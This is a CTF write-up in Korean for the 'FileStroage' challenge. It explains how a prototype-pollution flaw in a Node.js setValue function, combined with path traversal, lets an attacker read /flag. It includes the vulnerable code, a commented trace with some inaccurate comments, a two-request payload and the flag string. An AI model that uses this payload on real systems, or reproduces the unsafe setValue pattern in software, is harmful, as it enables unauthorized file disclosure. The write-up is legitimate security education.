[BOB CTF 8th] - FileStroage

0. Description

파일을 관리할 수 있는 구현이 덜 된 홈페이지입니다.

 

1. 페이지 구성

1. GET /
read객체의 filename property에 fake라는 스트링을 넣고 반환

2. POST /mkfile
파일 생성 기능, filename과 content를 입력받아 __dirname/storage/ 경로에 filename 값을 해쉬하여
해쉬 이름으로 파일을 생성한 파일 이름을 반환한다.

3. GET /readfile
filename 파라미터를 받을 경우 __dirname/storage/ 경로에서 filename 이름의 파일을 읽는다.
filename 파라미터가 없을 경우 read 오브젝트의 filename Property를 가져온다.

4. GET /test
func, filename, rename 파라미터를 받는다.
func가 rename일 경우 SetValue 함수를 통해 file 객체 property를 설정한다.
func가 reset일 경우 read 객체를 초기화한다.

 

2. 분석

먼저 flag의 위치는 dockerfile에 /flag로 확인된다.

아래 /readfile 에서 filename을 통해 path traversal 공격을 시도해 볼 수 있지만, "."이 모두 필터링되어 효과는 없다.

app.get('/readfile',function(req,resp){
	let filename=file[req.query.filename];
	if(filename==null){
		fs.readFile(__dirname+'/storage/'+read['filename'],'UTF-8',function(err,data){
			resp.send(data);
		})
	}else{
		read[filename]=filename.replaceAll('.','');
		fs.readFile(__dirname+'/storage/'+read[filename],'UTF-8',function(err,data){
        .
        .
        .
})

/readfile 에서 filename 파라미터가 없으면 read object의 filename property 값을 읽도록 되어있다.

prototype pollution을 이용하면 객체의 propety를 변조할 수 있다.

 

3. 취약점 파악 - SetValue func

취약점의 원인이 되는 함수이다.

JavaScript의 Prototype Pollution이 발생하는 함수로, 객체의 속성을 설정하며 다른 객체의 property 영향을 줄 수 있다.

Prototype Pollution에 대해서는 아래 게시글을 참고하자
https://blog.coderifleman.com/2019/07/19/prototype-pollution-attacks-in-nodejs/

function isObject(obj) {
  return obj !== null && typeof obj === 'object';
}

function setValue(obj, key, value) { 
  const keylist = key.split('.');    
  const e = keylist.shift();         
  if (keylist.length > 0) {          
    if (!isObject(obj[e])) obj[e] = {};
    setValue(obj[e], keylist.join('.'), value);
  } else {
    obj[key] = value;
    return obj;
  }
}

4. 취약점 트리거

setValue 함수는 /test?func=rename을 통해 호출된다.

setValue(rename, "__proto__.filename", "../../flag")으로 수행되면 아래 처럼 file 객체의 [__proto__]['filename'] property가 부여되고 이는 read 객체에도 영향을 끼친다.

 

아래는 setValue 함수를 위의 인자로 실행했을 경우이다.

function isObject(obj) {
  return obj !== null && typeof obj === 'object'; //if __proto__ = false & false return false
}
// 1st
function setValue(obj, key, value) { // obj is file = {} , key = __proto__.filename, value = ../../flag
  const keylist = key.split('.');    // keylist = ["__proto__", "filename"]
  const e = keylist.shift();         // keylist will be ["filename"]
  if (keylist.length > 0) {          // True
    if (!isObject(obj[e])) obj[e] = {}; // isObject return false so if is true -- obj[__proto__] = {}
    setValue(obj[e], keylist.join('.'), value);  // obj[e] is obj[__proto__], filename, ../../flag == try again setValue function
  } else {
    obj[key] = value;
    return obj;
  }
}
// 2nd 
function setValue(obj, key, value) { // obj is obj[__proto__] , key = filename, value = ../../flag
	const keylist = key.split('.');    // keylist = ["filename"]
	const e = keylist.shift();         // e = filename
	if (keylist.length > 0) {          // True
	  if (!isObject(obj[e])) obj[e] = {}; // isObject return false so if is true -- obj[__proto__][filename] = {}
	  setValue(obj[e], keylist.join('.'), value);  // obj[e] is obj[__proto__][filename], NULL , ../../flag == try again setValue function
	} else {
	  obj[key] = value;
	  return obj;
	}
  }

// 3rd 
function setValue(obj, key, value) { // obj is obj[__proto__][filename] , key = NULL, value = ../../flag
	const keylist = key.split('.');    // keylist = NULL
	const e = keylist.shift();         // e = NULL
	if (keylist.length > 0) {          // FALSE
	  if (!isObject(obj[e])) obj[e] = {}; // Not Execute
	  setValue(obj[e], keylist.join('.'), value);  // Not Execute
	} else {
	  obj[key] = value;                // file[__proto__][filename] = "../../flag"
	  return obj;                      // return file[__proto__][filename] = "../../flag"
	}
  }

setValue를 통해 read 객체의 filename property가 변조되면, /readfile 경로로 요청을 보내 read[filename]의 파일을 가져온다.

** payload **

GET /test?func=rename&filename=__proto__.filename&rename=../../flag

GET /readfile

FLAG - BISC{bob11_bisc_h4c_PR0T0LF1!!!!@#}